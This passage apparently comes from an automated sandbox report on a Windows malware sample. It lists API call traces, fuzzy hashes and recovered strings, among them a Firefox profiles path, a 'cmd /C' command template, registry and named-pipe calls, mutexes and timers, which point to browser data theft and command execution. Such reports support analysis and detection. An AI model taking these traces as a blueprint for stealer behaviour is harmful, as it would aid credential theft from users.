    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
